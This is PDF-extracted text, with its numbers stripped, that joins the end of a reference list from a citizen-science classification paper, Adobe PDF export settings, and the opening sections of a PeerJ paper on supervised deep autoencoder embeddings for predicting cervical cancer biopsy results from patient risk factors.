osf.io/ sqvp. references belleflamme p, lambert t, schwienbacher a. . crowdfunding: tapping the right crowd. journal of business venturing ( ): – doi . /j.jbusvent. . . . bonney r, cooper cb, dickinson j, kelling s, phillips t, rosenberg kv, shirk j. . citizen science: a developing tool for expanding science knowledge and scientific literacy. bioscience ( ): – doi . /bio. . . . . bonney r, shirk jl, phillips tb, wiggins a, ballard hl, miller-rushing aj, parrish jk. . next steps for citizen science. science ( ): – doi . /science. . burgess h, debey l, froehlich h, schmidt n, theobald e, ettinger a, hillerislambers j, tewksbury j, parrish jk. . the science of citizen science: exploring barriers to use as a primary research tool. biological conservation : – doi . /j.biocon. . . . caplan rd. . person-environment fit theory and organizations: commensurate dimensions, time perspectives, and mechanisms. journal of vocational behavior ( ): – doi . / - ( ) -x. cappa f, laut j, nov o, giustiniano l, porfiri m. . activating social strategies: face-to-face interaction in technology-mediated citizen science. journal of environmental management : – doi . /j.jenvman. . . . cappa f, laut j, porfiri m, giustiniano l. . bring them aboard: rewarding participation in technology-mediated citizen science projects. computers in human behavior : – doi . /j.chb. . . . cappa f, rosso f, hayes d. . monetary and social rewards for crowdsourcing. sustainability ( ): doi . /su . carlin bp, louis ta, carlin b. . bayes and empirical bayes methods for data analysis. boca raton: chapman and hall/crc. chen x, lin q, zhou d. . optimistic knowledge gradient policy for optimal budget allocation in crowdsourcing. proceedings of the th international conference on machine learning, pmlr ( ): – . curtis v. . motivation to participate in an online citizen science game. science communication ( ): – . dawid ap, skene am. . maximum likelihood estimation of observer error-rates using the em algorithm. applied statistics ( ): . delaney dg, sperling cd, adams cs, leung b. . marine invasive species: validation of citizen science and implications for national monitoring networks. biological invasions ( ): – doi . /s - - - . dempster ap, laird nm, rubin db. . maximum likelihood from incomplete data via the em algorithm. journal of the royal statistical society: series b ( ): – . dickinson jl, zuckerberg b, bonter dn. . citizen science as an ecological research tool: challenges and benefits. annual review of ecology, evolution, and systematics ( ): – doi . /annurev-ecolsys- - . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://osf.io/ sqvp http://dx.doi.org/ . /j.jbusvent. . . http://dx.doi.org/ . /bio. . . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /j.biocon. . . http://dx.doi.org/ . / - ( ) -x http://dx.doi.org/ . /j.jenvman. . . http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /su http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /annurev-ecolsys- - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ difallah de, catasta m, demartini g, ipeirotis pg, cudré-mauroux p. . the dynamics of micro-task crowdsourcing: the case of amazon mturk. in: proceedings of the th international conference on world wide web, florence, – . diner d, nakayama s, nov o, porfiri m. . social signals as design interventions for enhancing citizen science contributions. information, communication & society ( ): – doi . / x. . . estellés-arolas e, gonzález-ladrón-de guevara f. . towards an integrated crowdsourcing definition. journal of information science ( ): – doi . / . fawcett t. . an introduction to roc analysis. pattern recognition letters ( ): – doi . /j.patrec. . . . franzoni c, sauermann h. . crowd science: the organization of scientific research in open collaborative projects. research policy ( ): – doi . /j.respol. . . . frenay b, verleysen m. . classification in the presence of label noise: a survey. ieee transactions on neural networks and learning systems ( ): – . garriga j, piera j, bartumeus f. . a bayesian framework for reputation in citizen science. in: proceedings of the second workshop on data science for social good, ceur workshop proceedings. vol. , – . available at http://ceur-ws.org/vol- /paper .pdf. gelman a, carlin jb, stern hs, dunson db, vehtari a, rubin db. . bayesian data analysis. boca raton: chapman and hall/crc. goncalves j, feldman m, hu s, kostakos v, bernstein a. . task routing and assignment in crowdsourcing based on cognitive abilities. in: proceedings of the th international conference on world wide web companion, www ‘ companion. republic and canton of geneva: international world wide web conferences steering committee, – . ho c-j, jabbari s, vaughan jw. . adaptive task assignment for crowdsourced classification. in: proceedings of the th international conference on machine learning (icml- ). atlanta, – . howe j. . the rise of crowdsourcing. wired magazine ( ): – . jung hj, joon h. . quality assurance in crowdsourcing via matrix factorization based task routing. in: proceedings of the rd international conference on world wide web, www ‘ companion. new york: acm press, – . kallimanis as, panitsa m, dimopoulos p. . quality of non-expert citizen science data collected for habitat type conservation status assessment in natura protected areas. scientific reports : – . keith jm, davey cm, boyd se. . a bayesian method for comparing and combining binary classifiers in the absence of a gold standard. bmc bioinformatics ( ): doi . / - - - . kestler ha, lausser l, lindner w, palm g. . on the fusion of threshold classifiers for categorization and dimensionality reduction. computational statistics ( ): – doi . /s - - - . kim h-c, ghahramani z. . bayesian classifier combination. in: proceedings of the th international conference on artificial intelligence and statistics. la palma, – . kosmala m, wiggins a, swanson a, simmons b. . assessing data quality in citizen science. frontiers in ecology and the environment ( ): – . laut j, cappa f, nov o, porfiri m. . increasing patient engagement in rehabilitation exercises using computer-based citizen science. plos one ( ):e doi . /journal.pone. . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / x. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /j.respol. . . http://ceur-ws.org/vol- /paper .pdf http://dx.doi.org/ . / - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ laut j, cappa f, nov o, porfiri m. . increasing citizen science contribution using a virtual peer. journal of the association for information science and technology ( ): – doi . /asi. . laut j, henry e, nov o, porfiri m. . development of a mechatronics-based citizen science platform for aquatic environmental monitoring. ieee/asme transactions on mechatronics ( ): – . lehner o. . crowdfunding social ventures: a model and research agenda. venture capital ( ): – doi . / . . . li q, ma f, gao j, su l, quinn cj. . crowdsourcing high quality labels with a tight budget. in: proceedings of the ninth acm international conference on web search and data mining—wsdm ‘ . new york: acm press, – . majchrzak a, malhotra a. . towards an information systems perspective and research agenda on crowdsourcing for innovation. journal of strategic information systems ( ): – doi . /j.jsis. . . . martinez ez, louzada-neto f, derchain sfm, achcar ja, gontijo rc, sarian loz, syrjänen kj. . bayesian estimation of performance measures of cervical cancer screening tess in the presence of covarates and absence of a gold standard. cancer informatics : – doi . / . nakayama s, tolbert t, nov o, porfiri m. . social information as a means to enhance engagement in citizen science-based telerehabilitation. journal of the association for information science and technology ( ): – doi . /asi. . nov o, arazy o, anderson d. . dusting for science: motivation and participation of digital citizen science volunteers. in: proceedings of the iconference on–iconference ’ . new york: acm press, – . nov o, arazy o, anderson d. . scientists@home: what drives the quantity and quality of online citizen science participation? plos one ( ):e doi . /journal.pone. . nov o, laut j, porfiri m. . using targeted design interventions to encourage extra-role crowdsourcing behavior. journal of the association for information science and technology ( ): – doi . /asi. . palermo e, laut j, nov o, cappa p, porfiri m. a. a natural user interface to integrate citizen science and physical exercise. plos one ( ):e doi . /journal.pone. . palermo e, laut j, nov o, cappa p, porfiri m. b. spatial memory training in a citizen science context. computers in human behavior : – doi . /j.chb. . . . penin j, burger-helmchen t. . crowdsourcing of inventive activities: definition and limits. international journal of innovation and sustainable development ( / ): – doi . /ijisd. . . powers dmw. . evaluation: from precision, recall and f-measure to roc, informedness, markedness & correlation. journal of machine learning technologies ( ): – . raykar vc, yu s, zhao lh, valadez gh, florin c, bogoni l, moy l. . learning from crowds. journal of machine learning research : – . ryan r, deci e. . intrinsic and extrinsic motivations: classic definitions and new directions. contemporary educational psychology ( ): – doi . /ceps. . . sauermann h, franzoni c. . crowd science user contribution patterns and their implications. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /asi. http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.jsis. . . http://dx.doi.org/ . / http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /asi. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.chb. . . http://dx.doi.org/ . /ijisd. . http://dx.doi.org/ . /ceps. . http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sheng vs, provost f, ipeirotis pg. . get another label? improving data quality and data mining using multiple, noisy labelers. in: proceeding of the th acm sigkdd international conference on knowledge discovery and data mining—kdd . new york: acm press, – . silvertown j. . a new dawn for citizen science. trends in ecology & evolution ( ): – doi . /j.tree. . . . swanson a, kosmala m, lintott c, simpson r, smith a, packer c. . snapshot serengeti, high-frequency annotated camera trap images of mammalian species in an african savanna. scientific data ( ): doi . /sdata. . . torre m, nakayama s, tolbert tj, porfiri m. . producing knowledge by admitting ignorance: enhancing data quality through an “i don’t know” option in citizen science. plos one ( ):e doi . /journal.pone. . de lellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.tree. . . http://dx.doi.org/ . /sdata. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using demographics toward efficient data classification in citizen science: a bayesian approach introduction methods results discussion conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice supervised deep learning embeddings for the prediction of cervical cancer diagnosis supervised deep learning embeddings for the prediction of cervical cancer diagnosis kelwin fernandes , , davide chicco , jaime s. cardoso , and jessica fernandes instituto de engenharia de sistemas e computadores tecnologia e ciencia (inesc tec), porto, portugal universidade do porto, porto, portugal princess margaret cancer centre, toronto, on, canada universidad central de venezuela, caracas, venezuela abstract cervical cancer remains a significant cause of mortality all around the world, even if it can be prevented and cured by removing affected tissues in early stages. providing universal and efficient access to cervical screening programs is a challenge that requires identifying vulnerable individuals in the population, among other steps. in this work, we present a computationally automated strategy for predicting the outcome of the patient biopsy, given risk patterns from individual medical records. we propose a machine learning technique that allows a joint and fully supervised optimization of dimensionality reduction and classification models. we also build a model able to highlight relevant properties in the low dimensional space, to ease the classification of patients. we instantiated the proposed approach with deep learning architectures, and achieved accurate prediction results (top area under the curve auc = . ) which outperform previously developed methods, such as denoising autoencoders. additionally, we explored some clinical findings from the embedding spaces, and we validated them through the medical literature, making them reliable for physicians and biomedical researchers. subjects bioinformatics, computational biology, artificial intelligence, data mining and machine learning keywords dimensionality reduction, health-care informatics, denoising autoencoder, autoencoder, biomedical informatics, binary classification, deep learning, cervical cancer, artificial neural networks, health informatics introduction despite the possibility of prevention with regular cytological screening, cervical cancer remains a significant cause of mortality in low-income countries (kauffman et al., ). the cervical tumor is the cause of more than , cases per year, and kills more than , patients in the same period, worldwide (fernandes, cardoso & fernandes, ). however, cervical cancer can be prevented by means of the human papillomavirus infection (hpv) vaccine, and regular low-cost screening programs (centers for disease control and prevention (cdc), ). the two most widespread techniques in screening programs are conventional or liquid cytology and colposcopy (fernandes, cardoso & fernandes, ; plissiti & nikou, ; fernandes, cardoso & fernandes, b; xu et al., ). furthermore, this cancer can be cured by removing the affected tissues when how to cite this article fernandes et al. ( ), supervised deep learning embeddings for the prediction of cervical cancer diagnosis. peerj comput. sci. :e ; doi . /peerj-cs. submitted february accepted april published may corresponding author kelwin fernandes, kafc@inesctec.pt academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright fernandes et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:kafc@�inesctec.�pt https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ identified in early stages (fernandes, cardoso & fernandes, ; centers for disease control and prevention (cdc), ), in most cases. the development of cervical cancer is usually slow and preceded by abnormalities in the cervix (dysplasia). however, the absence of early stage symptoms might cause carelessness in prevention. additionally, in developing countries, there is a lack of resources, and patients usually have poor adherence to routine screening due to low problem awareness. while improving the resection of lesions in the first visits has a direct impact on patients that attend screening programs, the most vulnerable populations have poor or even non-existent adherence to treatment programs. scarce awareness of the problem and patients’ discomfort with the medical procedure might be the main causes of this problem. furthermore, in low-income countries, this issue can be due to lack of access to vulnerable populations with low access to information and medical centers. consequently, the computational prediction of individual patient risk has a key role in this context. identifying patients with the highest risk of developing cervical cancer can improve the targeting efficacy of cervical cancer screening programs: our software performs this operation computationally in a few minutes by producing accurate prediction scores. fernandes, cardoso & fernandes ( b) performed a preliminary attempt to tackle the problem of predicting the patient’s risk to develop cervical cancer through machine learning software. in that project, the authors employed transfer learning strategies for the prediction of the individual patient risk on a dataset of cervical patient medical tests. they focused on transferring knowledge between linear classifiers on similar tasks, to predict the patient’s risk (fernandes, cardoso & fernandes, b). given the high sparsity of the associated risk factors in the population, dimensionality reduction techniques can improve the robustness of the machine learning predictive models. however, many projects that take advantage of dimensionality reduction and classification use suboptimal approaches, where each component is learned separately (li et al., ; bessa et al., ; lacoste-julien, sha & jordan, ). in this work, we propose a joint strategy to learn the low-dimensional space and the classifier itself in a fully supervised way. our strategy is able to reduce class overlap by concentrating observations from the healthy patients class into a single point of the space, while retaining as much information as possible from the patients with high risk of developing cervical cancer. we based our prediction algorithm on artificial neural networks (anns), which are machine learning methods able to discover non-linear patterns by means of aggregation of functions with non-linear activations. a recent trend in this field is deep learning (lecun, bengio & hinton, ), which involves large neural network architectures with successive applications of such functions. deep learning, in fact, has been able to provide accurate predictions of patient diagnosis in multiple medical domains (xu et al., ; chicco, sadowski & baldi, ; fernandes, cardoso & astrup, a; cangelosi et al., ; alipanahi et al., ). we applied our learning scheme to deep variational autoencoders and feed-forward neural networks. finally, we explored fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ visualization techniques to understand and validate the medical concepts captured by the embeddings. we organize the rest of the paper as follows. after this introduction, we describe the proposed method and the dataset analyzed in the methods and dataset sections. afterwards, we describe the computational prediction results in the results section, the model outcome interpretation in the discussion section, and we conclude the manuscript outlining some conclusion and future development. methods high dimensional data can lead to several problems: in addition to high computational costs (in memory and time), it often leads to overfitting (van der maaten, postma & van den herik, ; chicco, ; moore, ). dimensionality reduction can limit these problems and, additionally, can improve the visualization and interpretation of the dataset, because it allows researchers to focus on a reduced number of features. for these reasons, we decided to map the original dataset features into a reduced dimensionality before performing the classification task. generally, to tackle high-dimensional classification problems, machine learning traditional approaches attempt to reduce the high-dimensional feature space to a low-dimensional one, to facilitate the posterior fitting of a predictive model. in many cases, researchers perform these two steps separately, deriving suboptimal combined models (li et al., ; bessa et al., ; lacoste-julien, sha & jordan, ). moreover, since dimensionality reduction techniques are often learned in an unsupervised fashion, they are unable to preserve and exploit the separability between observations from different classes. in dimensionality reduction, researchers use two categories of objective functions: one for maximizing the model capability of recovering the original feature space from the compressed low dimensional one, and another one for maximizing the consistency of pairwise similarities in both high and low dimensional spaces. since defining a similarity metric in a high-dimensional space might be difficult, we limit the scope of this work to minimizing the reconstruction loss. in this sense, given a set of labeled input vectors x = {x , x , : : : , xn}, where xi ∈ r d , ∀i ∈ , : : : ,n and y is a vector with the labels associated to each observation, we want to obtain two functions c: r d / rm and d: rm / rd such that m < d and that minimizes the following loss: lrðc; d; xÞ ¼ jxj x x x ðd � cÞðxÞ � xð Þ ( ) namely, the composition (○) of the compressing (c), and decompressing (d) functions approximate the identity function. in the following sections, we describe the proposed dimensionality reduction technique and its instantiation to deep learning architectures. fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ joint dimensionality reduction and classification since our final goal is to classify the data instances (observations), we need to achieve a good low-dimensional mapping and build the classifier independently. thereby, we propose a joint loss function that minimizes the trade-off between data reconstruction and classification performance: lðm; c; d; x; yÞ ¼ lcððm � cÞðxÞ; yÞ þ �lrðc; d; xÞ ( ) where m is a classifier that receives as input the vectors in the low dimensional space (c(x)), lc is a classification loss function such as categorical cross-entropy, and � � . in this case, we focus on the classification performance using eq. ( ) as a regularization factor of the models of interest. hereafter, we will denote this method as semi-supervised dimensionality reduction. fully supervised embeddings the previously proposed loss function consists of two components: a supervised component given by the classification task, and an unsupervised component given by the low-dimensional mapping. however, the scientific community aims at understanding the properties captured in the embeddings, especially on visual and text embeddings (kiros, salakhutdinov & zemel, ; levy, goldberg & ramat-gan, ). moreover, inducing properties in the low-dimensional space can improve the class separability. to apply this enhancement, we introduce partial supervision in the lr loss. we can explore these properties by learning the dimensionality reduction process in a supervised way. namely, learning a bottleneck supervised mapping function ((d ○ c)(x) ≈ m(x, y)) instead of the traditional identity function ((d ○ c)(x) ≈ x) used in reconstruction-based dimensionality reduction techniques. the reconstruction loss lr(c, d, x) becomes: lmðc; d; x; yÞ ¼ jxj x hx;yi x;y ðd � cÞðxÞ � mðx; yÞð Þ ( ) where m(x) is the desired supervised mapping. to facilitate the classification task, removing the overlap between both classes should be captured in low-dimensional spaces. without loss of generality, we assume that the feature space is non-negative. thereby we favor models with high linear separability between observations by using the mapping function eq. ( ) in eq. ( ). symðx; yÞ ¼ x; if y�x; if:y � ( ) in our application, if all the features are non-negative, the optimal patient’s behavior associates to the zero vector with total lack of risk patterns. on the other hand, a patient with high feature values is prone to have cancer. within the context of cervical cancer screening, we propose the mapping given by eq. ( ), where the decoded version of the healthy patients is the zero vector. this idea resembles the fact that their risk conduct fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ has not contributed to the disease occurrence. on the other hand, we mapped ill patients to their original feature space, for promoting the low-dimensional vectors to explain the original risk patterns that originated the disease. zeroðx; yÞ ¼ ðyÞ � x ( ) while the definition of the properties of interest to be captured by the low-dimensional space is application-dependent, the strategy to promote such behavior can be adapted to other contexts. deep supervised autoencoders autoencoders are special cases of deep neural networks for dimensionality reduction (chicco, sadowski & baldi, ; vincent et al., ). they can be seen as general feed- forward neural networks with two main sub-components: the first part of the neural network is known as the encoder, and its main purpose is to compress the feature space. the neural network achieves this step by using hidden layers with fewer units than the input features, or by enforcing sparsity in the hidden representation. the second part of the neural network, also known as the decoder, behaves in the opposite way, and tries to approximate the inverse encoding function. while these two components correspond to the c and d functions in eq. ( ), respectively, they can be broadly seen as a single ann that learns the identity function through a bottleneck, a low number of units, or through sparse activations. autoencoders are usually learned in an unsupervised fashion by minimizing the quadratic error eq. ( ). denoising autoencoders (da) represent a special case of deep autoencoders that attempt to reconstruct the input vector when given a corrupted version (vincent et al., ). da can learn valuable representations even in the presence of noise. scientists can experiment this task by adding an artificial source of noise in the input vectors. in the neural network architecture (fig. ), we also included a dropout layer after the input layer that randomly turns off at maximum one feature per patient (srivastava et al., ). thereby, we aim to build stable classifiers that produce similar outcomes for patients with small differences in their historical records. furthermore, we aim at producing stable decisions when patients lie on a subset of the answers to the doctors’ questions during the medical visit, by indicating absence of a given risk behavior (for example, high number of sexual partners, drug consumption, and others). we use a parametric rectifier linear unit (prelu) (he et al., ) as activation function in the hidden layers of our architectures (fig. ). prelu is a generalization of standard rectifier activation units, which can improve model fitting with low additional computational cost (he et al., ). the loss functions (eqs. and ) can learn a joint classification and encoding–decoding network in a multitask fashion (fig. ). additionally, to allow the neural network to use either the learned or the original representation, we include a bypass layer that concatenates the hidden representation with the corrupted input. in the past, researchers have used this technique in biomedical image segmentation with u-net architectures (ronneberger, fischer & brox, ) to recover possible losses in the compression process, fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and to reduce the problem of vanishing gradients. we use this bypass layer with cross-validation. in a nutshell, our contribution can be summarized as follows: (i) we formalized a loss function to handle dimensionality reduction and classification in a joint fashion, leading to a global optimal pipeline; (ii) in order to induce desired properties on the compressed space, we proposed a loss that measures the model’s capability to recreate a mapping with the desired property instead of the identity function usually applied in dimensionality reduction; (iii) we showed that multitask autoencoders based on neural networks can be used as a specific instance to solve this problem, and we instantiated this idea to model an individual patient’s risk of having cervical cancer. dataset the dataset we analyze contains medical records of patients, and covers a random sampling of patients between and who attended the gynecology service at figure deep denoising autoencoder. the blocks in blue and red represent the encoding (c) and decoding (d) components of the network, respectively. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ hospital universitario de caracas in caracas, venezuela. most of the patients belong to the lowest socioeconomic status (graffar classification: iv–v (graffar, )) with low income and educational level, being the population with the highest risk. the age of the patients spans between and years old ( years old on average). all patients are sexually active and most of them ( %) have been pregnant at least once. the screening process covers traditional cytology, the colposcopic assessment with acetic acid and the schiller test (lugol’s iodine solution) (fernandes, cardoso & fernandes, b). the medical records include the age of the patient, sexual activity (number of sexual partners and age of first sexual intercourse), number of pregnancies, smoking behavior, use of contraceptives (hormonal and intrauterine devices), and historical records of sexually transmitted diseases (stds) (table ). hence, we encoded the features denoted by bool � t, t ∈ {bool, int} as two independent values: whether or not the patient answered the question and, if she did, the answered value. in some cases, the patients decided not to answer some questions for privacy concerns. this behavior is often associated with risk behaviors being a relevant feature to explore when modeling risk patterns. therefore, we added a flag feature that allows the model to identify if the question was answered or not after missing value imputation. we encoded the categorical features using the one-of-k scheme. the hospital anonymized all the records before releasing the dataset. the dataset is now publically available on the machine learning repository website of the university of california irvine (uci ml) (university of california irvine, ), figure supervised deep embedding architecture. the blocks in blue, red, and green represent the encoding (c), decoding (d), and classification (m) components of the network, respectively. full-size doi: . /peerj-cs. /fig- fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ which also contains a description of the features (university of california irvine machine learning repository, ). to avoid problems of the algorithm behavior related to different value ranges of each feature, we scaled all the features in our experiments using [ , ] normalization, and we input missing data using the average value (chicco, ). while more complex pre-processing schemes could be introduced, such as inferring the missing value with a k-nearest neighbor model (santos et al., ), we decided to use this methodology to avoid additional complexity that would make it difficult to fairly compare the explored techniques. in most cases, the features positively correlate to the cancer variable, with representing the lack of that risk pattern and representing the maximum risk. results we measured the performance of the proposed methods with the area under the precision–recall (pr) curves (davis & goadrich, ; chicco, ) and the logistic loss (also known as cross-entropy loss) function. as baseline, we use a deep feed-forward neural network with a softmax activation in the output layer. the remaining parameters (such as the initial dropout layer, depth and optimization algorithm) conform to the ones used in the proposed methodologies (table ). the main hyper-parameters related to the network topology are the depth and width, which define the number of layers in the architecture and the size of the low-dimensional representation. table feature names and data type acquired in the risk factors dataset (fernandes, cardoso & fernandes, b). feature type feature type age int iud (years) int number of sexual partners bool � int sexually transmitted diseases (stds) (yes/no) bool � bool age of first sexual intercourse bool � int number of stds int number of pregnancies bool � int diagnosed stds categorical smokes (yes/no) bool � bool stds (years since first diagnosis) int smokes (years and packs) int � int stds (years last diagnosis) int hormonal contraceptives (yes/no) bool previous cervical diagnosis (yes/no) bool hormonal contraceptives (years) int previous cervical diagnosis (years) int intrauterine device (iud) (yes/no) bool previous cervical diagnosis categorical note: int, integer; bool, boolean. table set of possible options for fine-tuning each parameter. parameter values depth { , : : : , } width { , } regularization { . , . } bypass usage {false, true} fernandes et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we used a stratified -fold cross-validation in the assessment of the proposed methods. we optimized the neural networks by using the rmsprop optimization strategy (tieleman & hinton, ) for a maximum number of epochs, with early stopping after iterations without improvement and a batch size of . we validated these parameters empirically, and it was enough to ensure model convergence in all cases. we also validated the performance of other optimization strategies such as adam and stochastic gradient descent. however, we did not observe any gain in terms of predictive performance or convergence. we use sparse autoencoders by adding an l penalization term, to ensure that each unit combines a small subset of risk factors, as would be done by a human expert. we fine-tuned all the hyper-parameters using a grid search strategy with nested stratified threefold cross-validation. in this sense, we validated the performance of each network configuration on three training-validation partitions and choose the one that maximizes the area under the pr curve. then, for the best configuration, we re-trained the model using the entire training set. we chose the size of the low-dimensional space as part of this nested cross-validation procedure, and chose empirically the parameters related to the optimization algorithm (that are strategy, number of epochs, early stopping). to recreate the decisions made by the physician at different configurations of the screening process, we consider the observability of all possible subsets of screening outcomes when predicting the biopsy results. thereby, we cover scenarios where only behavioral and demographic information is observable 